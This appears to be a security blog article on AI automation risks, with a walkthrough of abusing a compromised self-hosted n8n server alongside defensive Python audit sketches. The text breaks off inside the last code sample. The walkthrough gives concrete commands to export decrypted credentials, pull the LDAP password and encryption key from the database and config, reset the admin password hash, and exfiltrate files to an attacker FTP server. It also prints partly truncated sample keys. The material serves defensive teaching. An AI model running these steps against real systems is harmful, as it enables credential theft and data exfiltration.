When AI Automation Becomes the New Attack Surface

AI automation is creating a new attack surface.

- AI agents can access APIs, data, and systems autonomously

- Automation increases speed—but reduces visibility and control

- Over-permissioned AI workflows expose sensitive data

- Without governance, AI becomes a security liability

AI is no longer just a tool—it is an operator.

From autonomous agents to workflow automation, AI systems are now executing tasks across applications, APIs, and infrastructure without constant human oversight.

But this shift introduces a new reality:

AI automation is becoming the attack surface.

As organizations adopt AI at scale, they are unknowingly expanding their exposure to risks like data leaks, over-permissioned systems, and invisible attack paths.

Is AI Automation a Security Risk?

Yes.

AI automation increases the attack surface by introducing autonomous systems that can access data, execute actions, and interact across environments without constant human oversight.

Without proper controls, these systems can expose organizations to new and often invisible attack paths.

What Is the AI Attack Surface?

The AI attack surface includes all systems, data, models, APIs, and workflows that AI interacts with or controls.

Unlike traditional software, AI systems:

- Access multiple tools and environments dynamically

- Execute actions autonomously

- Operate across cloud, SaaS, and internal systems

This creates a distributed and often opaque security boundary.

Why AI Automation Expands the Attack Surface

AI automation increases risk in three key ways:

1. Increased System Access

AI agents often require access to APIs, databases, and services—expanding potential entry points.

2. Non-Human Identities (NHIs)

AI systems operate using API keys, tokens, and service accounts, creating new identity risks.

3. Autonomous Decision-Making

AI systems can execute actions without validation, increasing the impact of compromise.

Key Risks of AI Automation

The most critical risks include:

- Over-permissioned AI agents with excessive access

- Prompt injection and manipulation attacks

- Data leakage across systems and logs

- Shadow AI adoption outside security controls

- Lack of visibility into AI-driven actions

Real-World Example: AI Agents as an Attack Surface

AI agents can:

- Read and write data across systems

- Execute code and workflows

- Interact with external services

If compromised, a single AI agent can expose entire environments due to its level of access and autonomy.

Why Traditional Security Models Fail

Traditional security assumes:

- Clear system boundaries

- Human-controlled actions

- Static access patterns

AI breaks these assumptions.

Automation introduces dynamic behavior, making it difficult to monitor, audit, and control activity in real time.

How to Secure AI Automation

To reduce risk, organizations must:

- Apply least-privilege access to AI agents

- Treat AI systems as untrusted entities (Zero Trust)

- Monitor AI activity continuously

- Rotate and secure API keys and tokens

- Implement governance and audit frameworks

Security must evolve alongside automation.
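To make least privilege concrete, here is a minimal Python sketch of a deny-by-default gate between an agent and its tools. It assumes the orchestration layer can intercept every tool call before it executes. The `AgentPolicy` class, the `authorize_tool_call` function and the tool names are hypothetical and do not belong to any specific platform's API. Tools that change state can be marked as needing human approval, which addresses the autonomous decision-making risk described earlier. Every decision is logged so AI-driven actions stay auditable.

```python
from __future__ import annotations

import logging
from dataclasses import dataclass, field

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("agent-gate")


class ToolCallDenied(Exception):
    """Raised when an agent requests a tool outside its allowlist."""


@dataclass
class AgentPolicy:
    """Hypothetical per-agent policy (names are illustrative)."""
    agent_id: str
    allowed_tools: set[str] = field(default_factory=set)
    # Subset of allowed_tools that may only run after a human signs off.
    approval_required: set[str] = field(default_factory=set)


def authorize_tool_call(policy: AgentPolicy, tool: str,
                        approved_by: str | None = None) -> str:
    """Return "allowed" or "pending_approval", or raise ToolCallDenied.

    Deny by default: the model asking for a tool never widens its access.
    """
    if tool not in policy.allowed_tools:
        log.warning("DENY agent=%s tool=%s", policy.agent_id, tool)
        raise ToolCallDenied(f"{policy.agent_id} may not call {tool!r}")
    if tool in policy.approval_required and approved_by is None:
        log.info("HOLD agent=%s tool=%s (awaiting approval)", policy.agent_id, tool)
        return "pending_approval"
    log.info("ALLOW agent=%s tool=%s approved_by=%s", policy.agent_id, tool, approved_by)
    return "allowed"


if __name__ == "__main__":
    policy = AgentPolicy(
        agent_id="billing-agent",
        allowed_tools={"crm.read_contact", "billing.create_invoice"},
        approval_required={"billing.create_invoice"},
    )
    print(authorize_tool_call(policy, "crm.read_contact"))        # allowed
    print(authorize_tool_call(policy, "billing.create_invoice"))  # pending_approval
    try:
        authorize_tool_call(policy, "drive.delete_file")
    except ToolCallDenied as exc:
        print("denied:", exc)
```

The design choice is that the allowlist lives outside the model. A prompt-injected agent can ask for anything, but it can only obtain what the policy already grants.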

Delegated Security and the Growing Responsibility Gap

While platforms like n8n, Activepieces, and Node‑RED provide powerful capabilities, they also come with a significant trade-off: security is largely delegated to whoever deploys and operates them.

For SaaS solutions such as Make.com or Zapier, the vendor manages the hosting environment, patching, and much of the underlying infrastructure security. This model reduces the customer's operational burden. However, the customer then depends on the provider’s security controls and inherits the provider’s exposure to supply chain incidents, along with any data residency limitations.

In self-hosted deployments, the situation changes entirely. The organization or consultant deploying the platform becomes fully responsible for:

- Securing the hosting environment (operating system hardening, network segmentation, TLS configuration).

- Authentication and authorization (enforcing strong admin access controls, integrating with identity providers if available).

- Managing secrets (API keys, service credentials, etc.).

- Keeping the platform updated (applying patches promptly to prevent known vulnerabilities from being exploited).

- Auditing flows and integrations (detecting unauthorized changes or malicious components).

- Vetting custom nodes and plugins (ensuring platforms like n8n only use trusted components, as untrusted plugins, such as an “Authentication Node” or “RAG Helper Node,” could masquerade as legitimate while exfiltrating credentials or acting as a man-in-the-middle for sensitive data).

This delegated security model is a common pattern in powerful open-source software, but it creates a responsibility gap when these platforms are deployed by organizations that lack mature security practices. In consulting-led deployments, long-term security often depends on whether ongoing maintenance and security monitoring are part of the service agreement. Furthermore, many organizations cannot allocate enough resources to ensure the process is maintained.

When platforms with this many integrations are improperly secured, the risks compound quickly. They often hold credentials for dozens of services, direct access to internal documents, and the ability to initiate actions on other systems. A single compromise can cascade across multiple integrated services.
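One lightweight way to enforce the "vetting custom nodes and plugins" responsibility is to pin each reviewed package to a cryptographic hash and reject anything that does not match. The sketch below assumes community node packages are reviewed as tarballs (for example, produced with `npm pack`) before installation. The `APPROVED_PACKAGES` mapping and the file name in it are hypothetical placeholders.

```python
from __future__ import annotations

import hashlib
from pathlib import Path

# Hypothetical allowlist: tarball file name -> SHA-256 recorded at review time.
# Populate it from your own review process; this entry is a placeholder.
APPROVED_PACKAGES: dict[str, str] = {
    "n8n-nodes-example-1.2.0.tgz": "0" * 64,
}


def sha256_of(path: Path) -> str:
    """Stream the file so large tarballs do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def vet_package(path: Path, approved: dict[str, str]) -> tuple[bool, str]:
    """Accept only packages that were reviewed AND are byte-for-byte unchanged."""
    expected = approved.get(path.name)
    if expected is None:
        return False, f"{path.name}: not on the approved list"
    actual = sha256_of(path)
    if actual != expected:
        return False, f"{path.name}: hash mismatch, refusing to install"
    return True, f"{path.name}: matches the reviewed version"
```

A deployment script would call `vet_package` for each tarball and abort on the first `False`. A matching hash only proves that the package is the one that was reviewed. Catching a malicious "Authentication Node" still depends on the review itself.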

AI-Specific Security Challenges

When automation platforms incorporate AI capabilities, the threat model changes. They are no longer just orchestration engines; they become execution environments for unpredictable models and untrusted inputs. This opens the door to a class of vulnerabilities that traditional workflow tools rarely encountered.

Some of the most relevant challenges include:

- OWASP LLM01 – Prompt Injection (Direct and Indirect): LLM nodes can be manipulated in two ways. The direct route is input typed into a user-facing chat interface. The indirect route is content the workflow processes: a malicious PDF in a RAG document store, or a carefully crafted email handled by an automation flow, can carry hidden instructions designed to manipulate downstream AI actions. Unlike traditional code injection, these attacks often bypass classic security controls because the “payload” is simply text.

- OWASP LLM02 – Sensitive Information Disclosure: AI models, like those integrated with n8n, may access sensitive data such as PII, PHI, financial details, or business secrets, whether through training/fine-tuning data, Retrieval-Augmented Generation (RAG) systems, or tools interfacing with sensitive databases. Attackers can exploit weak input validation or over-permissive access to extract this data. To prevent disclosure, carefully analyze and restrict input avenues, implement robust access controls, and use data sanitization to ensure sensitive information remains protected.

- OWASP LLM03 – Supply Chain Attacks: Similar to vulnerabilities in outdated third-party software, supply chain attacks in AI target the integrity of Large Language Models (LLMs) and their training data. Adversaries can manipulate these through tampering or data poisoning, compromising models sourced from external repositories like Hugging Face or even reputable vendors. Local models, often run via tools like Ollama, are especially vulnerable due to less rigorous vetting. To mitigate, use trusted sources, verify model integrity, and prioritize vendors with robust security practices.

- OWASP LLM04 – Data and Model Poisoning: Many deployments use vector databases to store proprietary documents’ embeddings for retrieval-augmented generation. If an attacker can insert or modify entries in these stores, they can subtly alter model responses, embed misinformation, or leak sensitive data. Poisoned data in a vector DB is not always obvious and can persist undetected for long periods.

- OWASP LLM06 – Excessive Agency: AI workflows, like those in n8n, often use extensions (e.g., MCP tools) to call functions or interface with external systems, enabling actions or data retrieval. An LLM agent’s decision to invoke these extensions, driven by user prompts, can be manipulated by attackers to access sensitive systems or privileged information.

- OWASP LLM08 – Vector and Embedding Weaknesses: In AI workflows that use Retrieval-Augmented Generation (RAG), such as those built in n8n, vector database updates must be carefully secured. Attackers can compromise database integrity through legitimate input channels (for example, via prompt injection) or by abusing accessible tools. The business impact depends on the compromised data and can be severe.

- OWASP LLM10 – Unbounded Consumption: When using third-party token-as-a-service solutions to access Large Language Models (LLMs) in tools like n8n, insufficient restrictions can allow attackers to perform excessive, uncontrolled inferences. This risks denial of service (DoS), economic losses from inflated usage costs, model theft, or service degradation.

These risks are amplified by the very nature of AI: models are designed to process and act on inputs they have never seen before. Unlike traditional software, where inputs and execution paths are usually well-defined, AI workflows are inherently unpredictable. This unpredictability, combined with deep integration into business systems, makes AI-enabled automation platforms a prime target for creative attacks.
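One mitigation for LLM10 is a per-caller token budget that caps how much inference any single user, webhook or workflow can trigger. The sketch below uses a sliding window. The `TokenBudget` class is hypothetical, and it assumes the token count of each request is known or estimated before the call is forwarded to the LLM provider.

```python
from __future__ import annotations

import time
from collections import defaultdict, deque
from typing import Callable


class TokenBudget:
    """Sliding-window token budget per caller (user, webhook, workflow...)."""

    def __init__(self, max_tokens: int, window_s: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.max_tokens = max_tokens
        self.window_s = window_s
        self.clock = clock  # injectable so the logic can be tested
        self._usage: dict[str, deque[tuple[float, int]]] = defaultdict(deque)

    def _used(self, caller: str, now: float) -> int:
        """Drop entries older than the window and sum what remains."""
        q = self._usage[caller]
        while q and now - q[0][0] >= self.window_s:
            q.popleft()
        return sum(tokens for _, tokens in q)

    def try_consume(self, caller: str, tokens: int) -> bool:
        """Record and allow the request only if it fits within the budget."""
        now = self.clock()
        if self._used(caller, now) + tokens > self.max_tokens:
            return False
        self._usage[caller].append((now, tokens))
        return True


if __name__ == "__main__":
    budget = TokenBudget(max_tokens=50_000, window_s=3600)
    if not budget.try_consume("webhook:client-intake", 1_200):
        print("budget exhausted: reject or queue the request")
```

Rejected requests never reach the provider, which bounds both the denial-of-service impact and the cost of abuse. The limits themselves are placeholders to be tuned per workflow.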

Inside the Breach: Abusing a Compromised n8n Server

Let’s take a look at a simple yet practical example of what could happen when an attacker gains access to one of these systems. We’ll walk through realistic exploitation paths, from initial access to data exfiltration. The goal is not to exaggerate attacks, but to demonstrate why these systems deserve the same level of threat modeling and hardening as any other piece of critical infrastructure.

Targeting a Law Firm’s Automation Stack

Consider this realistic scenario: a mid-sized law firm has adopted n8n to streamline internal processes. They’ve deployed it self-hosted, on-premises, with the help of a third-party IT consultancy. The platform powers several critical workflows:

- Intake and triage of client emails.

- Automated document generation and filing.

- RAG-based search over internal legal document archives using a local vector database and a self-hosted LLM.

- Automated billing, time tracking, and syncing with external SaaS services like Google Drive and a CRM.

The deployment was designed for flexibility and speed. Security, as is often the case in small-to-mid-sized firms, was treated as a “we’ll revisit it later” topic.

Initial Access

Consider a scenario where an attacker gains valid credentials for a Linux host running the n8n instance. This could happen through a number of common vectors:

- A reused SSH password from another breach.

- Stolen credentials through phishing.

- Credentials found in a compromised password manager vault.

- Credentials found in plain-text or backup files on network resources.

In this example, we will assume that valid SSH credentials are obtained for the Linux host running the n8n service, providing sufficient privileges to interact with the system and access its stored data.
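Most of the access vectors above end with a password typed into an SSH prompt. A first hardening step for the n8n host is therefore to disable password authentication in favor of keys. The sketch below flags risky settings in sshd_config text. It honors OpenSSH's "first value wins" rule and its defaults (PasswordAuthentication yes, PermitRootLogin prohibit-password). It is deliberately simplified: it ignores Include directives, Match blocks and the keyword=value syntax. On a live host, the output of `sshd -T` (the effective configuration) is a more reliable input, and the same function accepts it.

```python
from __future__ import annotations

# OpenSSH defaults when a keyword is absent (see sshd_config(5)).
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}


def effective_settings(config_text: str) -> dict[str, str]:
    """Parse 'Keyword value' lines; the first value for a keyword wins."""
    settings: dict[str, str] = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        parts = line.split(None, 1)
        keyword = parts[0].lower()
        if keyword == "match":
            break  # conditional blocks are out of scope for this sketch
        if len(parts) == 2 and keyword not in settings:
            settings[keyword] = parts[1].strip().lower()
    return {**DEFAULTS, **settings}


def audit_sshd(config_text: str) -> list[str]:
    s = effective_settings(config_text)
    findings = []
    if s["passwordauthentication"] != "no":
        findings.append("PasswordAuthentication is enabled: a reused or phished password is enough to log in")
    if s["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin is 'yes': root can log in directly")
    return findings
```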

From Access to Full Compromise

With administrative access to the Linux host running n8n, the attacker is now in a position to fully explore the automation stack and pivot into connected systems. At this stage, the objectives are clear: extract sensitive data, capture credentials, and maintain a foothold in the environment.

Credential and API Key Harvesting

Using the official n8n CLI, it is possible to export all stored credentials in decrypted form:

```
$ npx n8n export:credentials --all --decrypted --output=/tmp/creds.json
Successfully exported 4 credentials.
```

The exported file may contain:

- API keys for integrated services such as Google Drive, CRMs, billing systems, and internal databases.

- Connection strings and credentials for the local vector database used by the firm’s RAG pipeline.

- OAuth tokens for client-facing platforms and third-party tools.

Here is an example exported file:

```
$ cat /tmp/creds.json | jq
[
  {
    "createdAt": "2025-08-06T21:49:16.464Z",
    "updatedAt": "2025-08-06T21:49:16.454Z",
    "id": "2yEXheJv6nPC9PX6",
    "name": "Groq account",
    "data": {
      "apiKey": "gsk_LLjgF ...[TRUNCATED]... ReYXaxzpxeLylHI"
    },
    "type": "groqApi",
    "isManaged": false
  },
  {
    "createdAt": "2025-08-06T22:00:20.623Z",
    "updatedAt": "2025-08-06T22:00:20.621Z",
    "id": "HTfDPKVSwaKM0Ssh",
    "name": "Google Drive account",
    "data": {
      "email": "[email protected]",
      "privateKey": "-----BEGIN PRIVATE KEY-----\\nMIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCCbu8Xz4hC99Zy\\n3QArM50bF0XxMy4wD1CvfC8P+kVKa4hg7YV0SC6h7l0IM5Ue2FOLQ449HGhxSaeI\\nDmb7dExI+5t7CIELH9evhv27pr+UG ...[TRUNCATED]... pCh6mAYhmF/tDK95KsCqNCp\\nn3pUqPtNxhsLmyEOlO/4VJIYvCSjVL7NJ7ERX5ECgYEAq6egMnpqGHcba+pn5arF\\nN/PF1GHzNfO/78tHoKkQOyqr6HSaqJ4F4/dK27ekMc78qvZaPbBACMY1dyU2i2Kq\\n/NavNeiEdol8W8LKowtk1Kt/GAyLnOMWiuoX8386jvlzWa5fRKf7FSp2es0S3g+a\\n6gdUqd4Vel3l2Qnwri9uZJs=\\n-----END PRIVATE KEY-----\\n"
    },
    "type": "googleApi",
    "isManaged": false
  },
  {
    "createdAt": "2025-08-06T22:18:39.600Z",
    "updatedAt": "2025-08-06T22:18:46.255Z",
    "id": "5Evik5FGycd9wTvu",
    "name": "Ollama account",
    "data": {
      "baseUrl": "http://192.168.148.166:11434"
    },
    "type": "ollamaApi",
    "isManaged": false
  },
  {
    "createdAt": "2025-08-06T22:24:08.260Z",
    "updatedAt": "2025-08-06T22:24:08.257Z",
    "id": "vlPVzm3pRvMG5eu1",
    "name": "xAi account",
    "data": {
      "apiKey": "xai-TSdfGWqRxd7W ...[TRUNCATED]... lgIvJDkLMY3fZE"
    },
    "type": "xAiApi",
    "isManaged": false
  }
]
```
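Defenders can use the same export to measure the blast radius before an attacker does. The sketch below takes a list shaped like the export above. For each credential it reports the name, the type and the names (never the values) of the stored fields. It also flags plaintext `http://` endpoints such as the Ollama `baseUrl`, and credentials whose `updatedAt` suggests they have not been rotated. The 90-day threshold and the helper names are assumptions. A decrypted export is itself highly sensitive and should be generated on a trusted host and deleted immediately. Without `--decrypted`, `data` is expected to be an encrypted string, in which case the sketch reports only name, type and age.

```python
from __future__ import annotations

import json
from datetime import datetime, timedelta, timezone


def load_export(path: str) -> list[dict]:
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def inventory_credentials(creds: list[dict], max_age_days: int = 90,
                          now: datetime | None = None) -> list[dict]:
    """Summarize credentials without echoing any secret values."""
    now = now or datetime.now(timezone.utc)
    report = []
    for cred in creds:
        data = cred.get("data")
        is_dict = isinstance(data, dict)
        fields = sorted(data) if is_dict else []
        findings = []
        base_url = data.get("baseUrl") if is_dict else None
        if isinstance(base_url, str) and base_url.lower().startswith("http://"):
            findings.append("plaintext HTTP endpoint")
        # Timestamps in the export end in "Z"; normalize for fromisoformat().
        updated = datetime.fromisoformat(cred["updatedAt"].replace("Z", "+00:00"))
        if now - updated > timedelta(days=max_age_days):
            findings.append(f"not rotated in over {max_age_days} days")
        report.append({"name": cred.get("name"), "type": cred.get("type"),
                       "fields": fields, "findings": findings})
    return report

# Usage: for row in inventory_credentials(load_export("/tmp/creds.json")): print(row)
```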

Lateral Movement

Enterprise solutions frequently support LDAP authentication. It lets Active Directory users sign in and delegates user management to a central directory, often restricted to a specific group within the company.

When n8n is configured to use LDAP authentication, the credentials of the account used to bind to the directory are stored in n8n’s database in encrypted form. From an attacker’s perspective, these are ideally administrator credentials. Many LDAP-enabled products ask for an administrative account for binding, a practice that is not recommended. Unfortunately for defenders, the encryption key is also stored in a configuration file on the same host.

Extracting the LDAP Encrypted Password

If the n8n instance uses SQLite (the default), an attacker can query the settings table in the database.sqlite file to retrieve the LDAP configuration. If a different database such as PostgreSQL is used, the connection details for the database server can be found in the DB_POSTGRESDB_* environment variables. The SQLite case looks like this:

```
$ sqlite3 ~/.n8n/database.sqlite
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> select * from settings;
userManagement.isInstanceOwnerSetUp|true|1
ui.banners.dismissed|["V1"]|1
features.ldap|{"loginEnabled":true,"loginLabel":"admin","connectionUrl":"10.xxx.xxx.10","allowUnauthorizedCerts":false,"connectionPort":389,"connectionSecurity":"none","baseDn":"DC=versprite,DC=local","bindingAdminDn":"CN=admin,CN=Users,DC=versprite,DC=local","bindingAdminPassword":"U2FsdGVkX1/1PYzOcGmitt/2HhHftty1lJUfccONbQk=","emailAttribute":"mail","firstNameAttribute":"givenName","lastNameAttribute":"sn","loginIdAttribute":"sAMAccountName","ldapIdAttribute":"uid","userFilter":"(ObjectClass=user)","synchronizationEnabled":true,"synchronizationInterval":60,"searchPageSize":0,"searchTimeout":60}|1
features.oidc|{"clientId":"","clientSecret":"","discoveryEndpoint":"","loginEnabled":false}|1
userManagement.authenticationMethod|ldap|1
features.sourceControl.sshKeys|{"encryptedPrivateKey":"U2FsdGVkX18RTm044HYecyp8eHOyuUUuixrNGvovhGi6cQhAqOht7kbiLZ4dGeUTRgGHTcSx+qZKuVI9tk2WM8l1V219fPggxkkiu9NUAE0nky7KVrpyEa+cPs/JImTLTEOtNTzROh5xLDxw5QoCVI4pwv03uXJyYR7mZaZgau6MirNGloME1CWVbf2WDQWAeFWnpsmOAX47jfVHMATbU2DmupRpXbvncGDHPT5JBpExR4lqTcD07ElftmwdcCav5/aUNTsXUNDf7O9Vk/ulJLBx3nKTADUdvHe+bGwGMHCsYj9R22favllnQUzS23z3BNBaaHtfFoAM/xvR/tfzHQ43NILJaMkNS4COVZLryh7d+1mBOk10y14H+oRtua1nlQ4FlOcZBbR4wDzuVV8o0q3nRnD7zkfGALI6aXBs1CHk9OozS25ucT7SCRUSNZQX/zHl4IgtrHjRmf/vvhkSCMmvSlf2DNUAjKxNnqSq+lgUhKD6678kUlv4Duoo8y8eFBFl/nzDNswmWmFJmeiObRzmP6st9QXo6kEmv0JwdJj0GFsIQP58yPOpph6GJ3cH","publicKey":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFJCYxRtlTovjMpvlUMdXev/RPX45iBsI2tNL69sSfn0 n8n deploy key"}|1
features.sourceControl|{"branchName":"main","keyGeneratorType":"ed25519"}|1
sqlite> .exit
```

Observe that the encrypted password for the LDAP user admin is in the bindingAdminPassword attribute:

U2FsdGVkX1/1PYzOcGmitt/2HhHftty1lJUfccONbQk=
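The same row also tells a defender a lot about the LDAP integration itself. The following sketch audits the `features.ldap` value shown above. A `connectionSecurity` of `none` on port 389 means the bind password is sent to the directory in cleartext. A bind DN of `CN=admin,...` points to a privileged account where a dedicated, read-only service account would do. The sketch assumes the settings table columns are named `key` and `value` (the output above does not show column names). It treats any `connectionSecurity` value other than `none` as encrypted. The admin-DN check is only a naming heuristic.

```python
from __future__ import annotations

import json
import sqlite3


def load_ldap_settings(db_path: str) -> str | None:
    """Read the raw features.ldap JSON (assumes columns named key and value)."""
    conn = sqlite3.connect(db_path)
    try:
        row = conn.execute(
            'SELECT "value" FROM settings WHERE "key" = ?', ("features.ldap",)
        ).fetchone()
    finally:
        conn.close()
    return row[0] if row else None


def audit_ldap_settings(raw_json: str) -> list[str]:
    cfg = json.loads(raw_json)
    findings = []
    if cfg.get("connectionSecurity") == "none":
        findings.append("LDAP traffic is unencrypted: the bind password crosses the network in cleartext")
    if cfg.get("allowUnauthorizedCerts"):
        findings.append("TLS certificate validation is disabled (allowUnauthorizedCerts)")
    bind_dn = str(cfg.get("bindingAdminDn", ""))
    # Naming heuristic only: flags DNs whose first component is CN=admin.
    if bind_dn.lower().startswith("cn=admin,"):
        findings.append(f"bind account looks privileged ({bind_dn}); prefer a read-only service account")
    return findings
```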

Getting the Encryption Key

By examining the n8n source code, an attacker can readily identify the files containing the encryption and decryption mechanisms used to manage the LDAP password.

```
~\.npm\_npx\a8a7eec953f1f314\node_modules\n8n\dist\ldap.ee\ldap.service.ee.js
~\.npm\_npx\a8a7eec953f1f314\node_modules\n8n-core\dist\encryption\cipher.js
~\.npm\_npx\a8a7eec953f1f314\node_modules\n8n-core\dist\instance-settings\instance-settings.js
```

From these files, an attacker can learn the exact algorithm used to encrypt and decrypt the password. The files also reveal that the encryption key is stored in the ~/.n8n/config file:

```
$ cat ~/.n8n/config
{
  "encryptionKey": "T7WwP6wHLDIS635iXYm3S1dRbthzS0rm"
}
```
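Because the key sits in a plain file next to the database it protects, anyone who can read both can decrypt every stored secret. The sketch below checks two things on the n8n host: whether the config file is accessible to group or other users, and whether it holds an `encryptionKey` at all. n8n also accepts the key through the `N8N_ENCRYPTION_KEY` environment variable, so the key can be injected from a secrets manager instead of living on disk. Consult the n8n documentation for how this interacts with an existing config file. Neither measure stops an attacker who already has root. Both do reduce exposure to low-privileged accounts and to copies of the data directory in backups. The function name is hypothetical.

```python
from __future__ import annotations

import json
import stat
from pathlib import Path


def audit_key_storage(config_path: Path) -> list[str]:
    findings: list[str] = []
    if not config_path.exists():
        return findings
    mode = config_path.stat().st_mode
    # Any permission bit for group or other is too broad for a key file.
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(
            f"{config_path} is accessible to group/other ({stat.filemode(mode)}); use chmod 600"
        )
    try:
        data = json.loads(config_path.read_text(encoding="utf-8"))
        if isinstance(data, dict) and "encryptionKey" in data:
            findings.append(f"encryption key is stored on disk in {config_path}")
    except (json.JSONDecodeError, OSError):
        findings.append(f"{config_path} could not be parsed as JSON")
    return findings


if __name__ == "__main__":
    for finding in audit_key_storage(Path.home() / ".n8n" / "config"):
        print("-", finding)
```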

Decrypting the Password

With the algorithm and the encryptionKey in hand, the password can be decrypted using a short script (decrypt.py, not shown here) that reimplements n8n’s decryption routine:

```
$ python3 decrypt.py "T7WwP6wHLDIS635iXYm3S1dRbthzS0rm" "U2FsdGVkX1/1PYzOcGmitt/2HhHftty1lJUfccONbQk="
Password_
```

Accessing Web Console

In addition to exporting and decrypting credentials, an attacker could gain access to the n8n web console by resetting the admin account password directly in the database. The attacker may retrieve the username and store the original password hash to restore it later. This approach helps the attacker remain stealthy, minimizing the likelihood of detection.

Let’s see how the attacker would proceed if the n8n instance uses a SQLite database:

```
$ sqlite3 ~/.n8n/database.sqlite
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> select * from user;
5b6af6af-5be3-455a-9b71-5c172c3184b4|[email protected]|John|Admin|$2a$10$kDrtlLlB7gU9tHdrBaw33eTfqN8Mmq1xFoqQtta7Q2JgW0Didl8Ma|{"version":"v4","personalization_survey_submitted_at":"2025-08-06T19:18:15.128Z","personalization_survey_n8n_version":"1.105.3"}|2025-08-06 19:14:33.867|2025-08-06 22:22:37.107|{"userActivated":false,"easyAIWorkflowOnboarded":true}|0|0|||global:owner|2025-08-06
sqlite>
```

The attacker can generate a new hash for the password in Python:

```
>>> import bcrypt
>>> bcrypt.hashpw(b"foobar", bcrypt.gensalt()).decode()
'$2b$12$KJN1q7lft8rwXyuJgYcwv.1A4aiUW1XCeTDW/NhE1BhNDpSMZeogy'
```

Then the attacker will replace the password’s hash:

```
sqlite> update user set password='$2b$12$KJN1q7lft8rwXyuJgYcwv.1A4aiUW1XCeTDW/NhE1BhNDpSMZeogy' WHERE email='[email protected]';
sqlite> .exit
```

The attacker can then log in to the web interface as the administrator.
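This technique leaves a trace. In the session above, the injected hash (`$2b$12$...`) does not even match the format of the original (`$2a$10$...`). The sketch below snapshots the `email` and `password` columns of the SQLite `user` table and compares them with a baseline. It flags changed hashes and notes when the bcrypt prefix or cost changes. A careful attacker can match the original format, so the hash comparison itself is the main signal. Several caveats apply. The baseline must be stored off the host, otherwise the attacker can update it too. Legitimate password changes will also alert. An attacker who restores the original hash between snapshots, as described above, is only caught if snapshots run often enough. The function names are hypothetical.

```python
from __future__ import annotations

import sqlite3


def snapshot_password_hashes(db_path: str) -> dict[str, str]:
    """Map email -> stored password hash for every user that has one."""
    conn = sqlite3.connect(db_path)
    try:
        rows = conn.execute("SELECT email, password FROM user").fetchall()
    finally:
        conn.close()
    return {email: pw for email, pw in rows if pw}


def bcrypt_params(h: str) -> str:
    """'$2a$10$...' -> '$2a$10$' (algorithm variant and cost factor)."""
    return h[:7]


def diff_hashes(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    alerts = []
    for email, pw in sorted(current.items()):
        old = baseline.get(email)
        if old is None:
            alerts.append(f"new account with password: {email}")
        elif pw != old:
            note = ""
            if bcrypt_params(pw) != bcrypt_params(old):
                note = f" (hash format changed {bcrypt_params(old)} -> {bcrypt_params(pw)})"
            alerts.append(f"password hash changed for {email}{note}")
    for email in sorted(baseline.keys() - current.keys()):
        alerts.append(f"account removed: {email}")
    return alerts
```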

Manipulating Automation Flows

Once the attacker has obtained full administrative control through the web interface, they can directly modify existing flows by:

- Inserting a malicious node that acts as a man-in-the-middle on key workflows. For example, a “Document Processor” node in the legal research flow that silently sends copies of processed documents to an attacker-controlled endpoint.

- Altering webhook-triggered flows to execute additional payloads or log inbound client information for later extraction.

- Modifying RAG helper flows to subtly adjust model responses, potentially influencing legal research or document generation.

Because these changes can be embedded inside normal-looking workflows, they are unlikely to be noticed unless a formal review process is in place.



As an example, consider the following simple demo RAG workflow.

This workflow monitors a designated Google Drive folder, triggering execution whenever a new file is created. The workflow then downloads the file, extracts its text, generates embeddings using a specified model, and stores the resulting vectors in a database for search purposes.



An attacker could add a simple FTP node to this workflow to exfiltrate each file as soon as it is uploaded to Google Drive and the workflow is triggered. A single node like this is enough. Whenever a new document is uploaded, the FTP node silently uploads a copy to the attacker’s FTP server:

```
$ python3 server.py
Starting FTP server on 0.0.0.0:21...
[I 2025-08-06 19:34:47] concurrency model: async
[I 2025-08-06 19:34:47] masquerade (NAT) address: None
[I 2025-08-06 19:34:47] passive ports: None
[I 2025-08-06 19:34:47] >>> starting FTP server on 0.0.0.0:21, pid=1087564 <<<
[I 2025-08-06 19:37:22] 186.xxx.xx.126:56610-[] FTP session opened (connect)
[I 2025-08-06 19:37:23] 186.xxx.xx.126:56610-[anonymous] USER 'anonymous' logged in.
[I 2025-08-06 19:37:25] 186.xxx.xx.126:56610-[anonymous] STOR /home/user/ftp/ftp_root/ codeofconduct.pdf completed=1 bytes=1129277 seconds=1.304
[I 2025-08-06 19:37:25] 186.xxx.xx.126:56610-[anonymous] FTP session closed (disconnect).
```

Although this example involves a small workflow, a real-world company would typically manage multiple workflows in n8n, each potentially comprising dozens of interconnected nodes. This complexity could allow an attacker to insert a malicious node discreetly, making it challenging for an administrator to detect the alteration.
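Part of that review can be automated by comparing each workflow's node types against the set expected for it. The sketch below reads workflows in the JSON format produced by the n8n CLI (for example `npx n8n export:workflow --all --output=workflows.json`) and lists every node whose `type` is not approved. The node type strings in the allowlist are illustrative assumptions; take the real values from a known-good export. An attacker can still misuse an approved node type, such as an HTTP request node pointed at their own server. This check therefore complements the checksum comparison described in the recommendations rather than replacing it.

```python
from __future__ import annotations

import json

# Illustrative allowlist for the demo RAG workflow; replace with the exact
# "type" values taken from a known-good export of your own instance.
APPROVED_TYPES = {
    "n8n-nodes-base.googleDriveTrigger",
    "n8n-nodes-base.googleDrive",
}


def load_workflows(path: str) -> list[dict]:
    with open(path, encoding="utf-8") as fh:
        data = json.load(fh)
    # Defensive: accept a single workflow object as well as a list.
    return data if isinstance(data, list) else [data]


def find_unapproved_nodes(workflows: list[dict],
                          approved: set[str]) -> list[tuple[str, str, str]]:
    """Return (workflow name, node name, node type) for every unexpected node."""
    hits = []
    for wf in workflows:
        for node in wf.get("nodes", []):
            node_type = node.get("type", "?")
            if node_type not in approved:
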